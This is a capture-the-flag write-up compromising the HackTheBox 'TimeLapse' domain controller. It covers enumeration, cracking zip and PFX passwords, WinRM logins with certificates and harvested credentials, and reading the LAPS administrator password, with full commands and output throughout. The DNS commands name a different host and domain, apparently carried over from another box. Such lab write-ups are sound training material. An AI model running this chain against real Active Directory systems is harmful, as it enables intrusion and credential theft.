TimeLapse
Easy Windows Active Directory Box on HackTheBox
Reconnaissance
As always we start off by performing a TCP Port scan to enumerate services and versions running on open ports, with the use of Nmap
nmap --privileged -p- --open -Pn -n --min-rate 5000 -sS -sCV -oN scan 10.10.11.152# Nmap 7.95 scan initiated Tue Aug 5 11:39:01 2025 as: /usr/lib/nmap/nmap --privileged -p- --open -Pn -n --min-rate 5000 -sS -sCV -oN scan 10.10.11.152
Nmap scan report for 10.10.11.152
Host is up (0.046s latency).
Not shown: 65518 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-08-05 18:39:46Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ldapssl?
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
3269/tcp open globalcatLDAPssl?
5986/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
| ssl-cert: Subject: commonName=dc01.timelapse.htb
| Not valid before: 2021-10-25T14:05:29
|_Not valid after: 2022-10-25T14:25:29
| tls-alpn:
|_ http/1.1
|_http-server-header: Microsoft-HTTPAPI/2.0
|_ssl-date: 2025-08-05T18:41:16+00:00; +7h59m59s from scanner time.
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open msrpc Microsoft Windows RPC
49673/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49674/tcp open msrpc Microsoft Windows RPC
49695/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 7h59m58s, deviation: 0s, median: 7h59m58s
| smb2-time:
| date: 2025-08-05T18:40:37
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Aug 5 11:41:17 2025 -- 1 IP address (1 host up) scanned in 135.95 secondsAfter reading the scan for a bit we can already know that we're facing a DC (Domain Controller) because of the simultaneously open ports like TCP Port 53 (DNS) TCP Port 88 (Kerberos) TCP Port 135 (RPC) TCP Port 389 (LDAP) ...
We can also see the domain name which is timelapse.htb se we'lld add it to our /etc/hosts file
As I always say when pentesting Active Directory, methodology is the most important so we'll enumerate as much as we can, starting off by TCP Port 53 (DNS) using dig to try and enumerate useful information out of records
dig @10.10.11.35 cicada.htb NS
...
dig @10.10.11.35 cicada.htb MX
...
dig @10.10.11.35 cicada.htb TXT
...
dig @10.10.11.35 cicada.htb AXFR
...But we don't seem to find anything useful here, so let's move on to port 88 (Kerberos) and let's try to perfrom a user enumeration bruteforce with the tool Kerbrute (Available here)
kerbrute userenum --dc 10.10.11.152 -d timelapse.htb /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: dev (n/a) - 08/05/25 - Ronnie Flathers @ropnop
2025/08/05 12:33:19 > Using KDC(s):
2025/08/05 12:33:19 > 10.10.11.152:88
2025/08/05 12:33:22 > [+] VALID USERNAME: guest@timelapse.htb
2025/08/05 12:33:30 > [+] VALID USERNAME: administrator@timelapse.htbAnd we found 2 valid users: Guest and Administrator so let's keep enumerating
Let's go with TCP Port 135 (RPC) now using rpcclient
rpcclient -U 'guest' 10.10.11.152
Password for [WORKGROUP\guest]:
rpcclient $> enumdomusers
result was NT_STATUS_ACCESS_DENIED
rpcclient $> enumdomgroups
result was NT_STATUS_ACCESS_DENIED
rpcclient $> querydispinfo
result was NT_STATUS_ACCESS_DENIED
rpcclient $> But we see that our access is denied...
Now let's move on into TCP Port 389 (LDAP) using ldapsearch to enumerate possible useful information with the use of a NULL Session
ldapsearch -x -H ldap://10.10.11.152 -b "dc=timelapse,dc=htb"
# extended LDIF
#
# LDAPv3
# base <dc=timelapse,dc=htb> with scope subtree
# filter: (objectclass=*)
# requesting: ALL
#
# search result
search: 2
result: 1 Operations error
text: 000004DC: LdapErr: DSID-0C090A5C, comment: In order to perform this opera
tion a successful bind must be completed on the connection., data 0, v4563
# numResponses: 1We don't seem to find anything useful here neither so it's time to enumerate TCP Port 445 (SMB) with the use of NetExec (Newer version of CrackMapExec)
❯ netexec smb 10.10.11.152 -u 'guest' -p '' --shares
SMB 10.10.11.152 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:timelapse.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.152 445 DC01 [+] timelapse.htb\guest:
SMB 10.10.11.152 445 DC01 [*] Enumerated shares
SMB 10.10.11.152 445 DC01 Share Permissions Remark
SMB 10.10.11.152 445 DC01 ----- ----------- ------
SMB 10.10.11.152 445 DC01 ADMIN$ Remote Admin
SMB 10.10.11.152 445 DC01 C$ Default share
SMB 10.10.11.152 445 DC01 IPC$ READ Remote IPC
SMB 10.10.11.152 445 DC01 NETLOGON Logon server share
SMB 10.10.11.152 445 DC01 Shares READ
SMB 10.10.11.152 445 DC01 SYSVOL Logon server share We see some valid shares and one uncommon share named Shares so let's try to see whats inside using smbclient
smbclient -U 'guest' //10.10.11.152/Shares We extracted some files but the ones that catch our attention are winrm_backup.zip and 2 .docx files: LAPS_OperationsGuide.docx LAPS_TechnicalSpecification.docx LAPS_Datasheet.docx
After reading the .docx files for a bit I found nothing useful so let's move on to the zip
Zip Password Cracking
As the zip file asks us for a password we'll try to crack it with zip2john and then john
zip2john winrm_backup.zip > hash.txt
ver 2.0 efh 5455 efh 7875 winrm_backup.zip/legacyy_dev_auth.pfx PKZIP Encr: TS_chk, cmplen=2405, decmplen=2555, crc=12EC5683 ts=72AA cs=72aa type=8
john --wordlist=/usr/share/seclists/rockyou.txt hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 20 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
(winrm_backup.zip/legacyy_dev_auth.pfx)
1g 0:00:00:00 DONE (2025-08-05 12:47) 9.090g/s 31650Kp/s 31650Kc/s 31650KC/s swimfan09..sunmoontree
Use the "--show" option to display all of the cracked passwords reliably
Session completed. And we cracked the passwrd — supremelegacy so let's unzip the file
unzip winrm_backup.zip
Archive: winrm_backup.zip
[winrm_backup.zip] legacyy_dev_auth.pfx password: supremelegacy
inflating: legacyy_dev_auth.pfx And we found another file: legacyy_dev_auth.pfx
PFX Cracking
And some people may ask, what is a PFX file?
A PFX file, also known as a PKCS#12 file, is a password-protected archive that stores a digital certificate and its corresponding private key
So let's crack it with the use of pfx2john and john
pfx2john legacyy_dev_auth.pfx > hash2.txt
john --wordlist=/usr/share/seclists/rockyou.txt hash2.txt
Using default input encoding: UTF-8
Loaded 1 password hash (pfx, (.pfx, .p12) [PKCS#12 PBE (SHA1/SHA2) 256/256 AVX2 8x])
Cost 1 (iteration count) is 2000 for all loaded hashes
Cost 2 (mac-type [1:SHA1 224:SHA224 256:SHA256 384:SHA384 512:SHA512]) is 1 for all loaded hashes
Will run 20 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
thuglegacy (legacyy_dev_auth.pfx)
1g 0:00:00:11 DONE (2025-08-05 12:53) 0.08389g/s 271463p/s 271463c/s 271463C/s thuglife03282006..thomasfelton
Use the "--show" option to display all of the cracked passwords reliably
Session completed. And we found another password — thuglegacy so let's extract the files for legacyy_dev_auth.pfx using openssl
openssl pkcs12 -in legacyy_dev_auth.pfx -clcerts -nokeys -out cert.pem
Enter Import Password: thuglegacy
❯ openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -nodes -out key.pem
Enter Import Password: thuglegacyAnd now we've got both files: the certificate and the key so we'll try and use these to login via WinRM using Evil-WinRM to the user legacyy shown on cert.pem
evil-winrm -i 10.10.11.152 -u legacyy -c cert.pem -k key.pem -S
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Warning: SSL enabled
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\legacyy\Documents> And we're in!
User pivoting
After some manual enumeration we find some useful information in the command line history
*Evil-WinRM* PS C:\Users\legacyy\Documents> type $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
whoami
ipconfig /all
netstat -ano |select-string LIST
$so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck
$p = ConvertTo-SecureString 'E3R$Q62^12p7PLlC%KWaxuaV' -AsPlainText -Force
$c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p)
invoke-command -computername localhost -credential $c -port 5986 -usessl -
SessionOption $so -scriptblock {whoami}
get-aduser -filter * -properties *
exitsuch as a valid password — E3R$Q62^12p7PLlC%KWaxuaV and a valid user — svc_deploy so let's try to pivot to this user using evil-winrm as we did earlier with the legacyy user
evil-winrm -i 10.10.11.152 -u svc_deploy -p 'E3R$Q62^12p7PLlC%KWaxuaV' -S
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Warning: SSL enabled
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc_deploy\Documents> And we successfully pivoted to the svc_deploy user using manual enumeration!
Privilege Escalation — LAPS Abuse
After manual enumeration in this user, we find that it's a strange group — LAPS_Readers
*Evil-WinRM* PS C:\Users\svc_deploy\Documents> net user svc_deploy
User name svc_deploy
Full Name svc_deploy
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 10/25/2021 12:12:37 PM
Password expires Never
Password changeable 10/26/2021 12:12:37 PM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon 10/25/2021 12:25:53 PM
Logon hours allowed All
Local Group Memberships *Remote Management Use
Global Group memberships *LAPS_Readers *Domain Users
The command completed successfully.so let's find if we can abuse LAPS, but first let's explain this is:
LAPS (Local Administrator Password Solution) is a Microsoft feature that automatically sets a unique, random password for the local Administrator account on each domain-joined computer.
We'll use the following github repository: AdmPwd.PS in order to abuse LAPS we will need to download the whole folder to the victim
# Upload the folder and move to the target directory
*Evil-WinRM* PS C:\Users\svc_deploy\Desktop> upload AdmPwd.PS
*Evil-WinRM* PS C:\Users\svc_deploy\Desktop> cd AdmPwd.PS
# Import the module
*Evil-WinRM* PS C:\Users\svc_deploy\Desktop\AdmPwd.PS> Import-Module ./AdmPwd.PS.psd1Now let's aim for DC01 to see if we can retrieve the password
*Evil-WinRM* PS C:\Users\svc_deploy\Desktop\AdmPwd.PS> get-admpwdpassword -computername dc01 | Select password
Password
--------
3H&)(xW48CNE68L9,0,bL0WoAnd we found a valid password!! — 3H&)(xW48CNE68L9,0,bL0Wo
Let's try to login via WinRM using Evil-WinRM
evil-winrm -i 10.10.11.152 -u administrator -p '3H&)(xW48CNE68L9,0,bL0Wo' -S
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Warning: SSL enabled
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents>And we're in!!! Now we can retrieve the flag and confirm that we Pwned this box completely!!
Hope you found this write-up useful and see you next time!! <3
Last updated